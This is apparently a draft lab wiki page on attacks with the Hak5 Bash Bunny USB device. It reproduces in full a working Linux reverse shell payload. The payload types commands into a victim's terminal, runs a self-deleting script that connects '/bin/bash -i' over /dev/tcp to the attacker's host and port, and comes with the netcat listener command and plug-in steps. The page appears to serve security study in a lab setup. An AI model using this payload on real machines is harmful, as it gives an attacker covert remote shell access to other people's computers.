Difference between revisions of "Bash Bunny Exploits"

Summary

This is a DRAFT. The Hak5 Bash Bunny will be used for various exploits which will be explained, documented and evaluated in the following chapters.

Requirements

• Operating system: Ubuntu 18.04 bionic amd64, Windows 10
• Hardware: Hak5 Bash Bunny

In order to get a general idea about the Bash Bunny, please refer to Hak5 Bash Bunny or the official Hak5 Documentation and Git repository.

Exploits

Reverse shell on Linux

Reverse shell mechanism

For this exploit, the Linux Reverse Shell payload is used, which is in the remote access category on Bash Bunny's Git Repository. It has been altered minimally to fit the OS requirements.

bashbunny-payloads/payloads/library/remote_access/LinuxReverseShell

The payload is to be copied from the library and pasted to either switch1 or switch2 on the Bash Bunny, while it is plugged in in Arming mode. The RHOST and RPORT variables in the payload are to be preconfigured depending on the IP address and listening port of the attacker.

The payload itself is a textfile payload.txt and comes with a script a.sh as well. It is well documented, which in the case of the Bash Bunny is quite a rarity and helps with the understanding of the program. The contents are the following:
payload.txt

#!/bin/bash
#
# Title:         Linux Reverse Shell
# Author:        tuzzmaniandevil
# Version:       1.2
#
# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
#
# Magenta..................Setup
# Yellow single blink......Executing
# Green....................Finished

# Config options
RHOST=127.0.0.1
RPORT=4444

# Start Setup
LED SETUP

# Gets Switch Position
GET SWITCH_POSITION

# Set Attack Mode
ATTACKMODE HID STORAGE

# Get the switch position
GET SWITCH_POSITION

# Open a terminal
QUACK ALT F2
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 500
QUACK ENTER

# Wait for terminal to open
sleep 1
LED STAGE1

# Copy bash script
Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/"
Q STRING $SWITCH_POSITION
Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT"
Q ENTER

# Quit the terminal
LED CLEANUP
Q STRING exit
Q ENTER

LED FINISH

a.sh

#!/bin/bash
A="$0"
H=$1
P=$2
/bin/bash -c /bin/bash -i > /dev/tcp/$H/$P 0<&1 2>&1 &
disown $!
rm -f "$A"

The setup is the following:

• as an attacker, a Kali Linux VM is used
• as the victim, since this is a Linux Reverse Shell, Ubuntu 20.04 is used to represent a regular PC client at a company or private computer (if another victim machine is used, the code which determines the terminal window to open must be accustomed to the proper shortcuts of that OS)

As already explained above in the principle of the reverse shell attack, on the attacker a listener is set up with netcat with the following command:

nc -lvp 4444

Now that the attacker is awaiting a connection on port 4444, the Bash Bunny is ready to be plugged into the victim (the switch must be set to the correct position, which is the one where the payload has been configured). After that, a terminal window is opened, the commands from the payload are entered in, the script a.sh is called, and then the terminal window closes again. This whole process doesn't take longer than about 5 seconds, and after that, on the attacker's Kali machine it is already visible that the connection is successful, which can be proven by a quick whoami.

Password Grabber

References

• https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny
• https://github.com/hak5/bashbunny-payloads
• https://youtu.be/JlGSuQ21Vt8
• https://www.youtube.com/watch?v=LtqsKftRFiw
• Keshav Kaushik, Sakshi Aggarwal, Shashank Mudgal, Shubh Saravgi, and Vibhor Mathur. A novel approach to generate a reverse shell: Exploitation and prevention. International Journal of Intelligent Communication, Computing, and Networks, 2(2), 2021.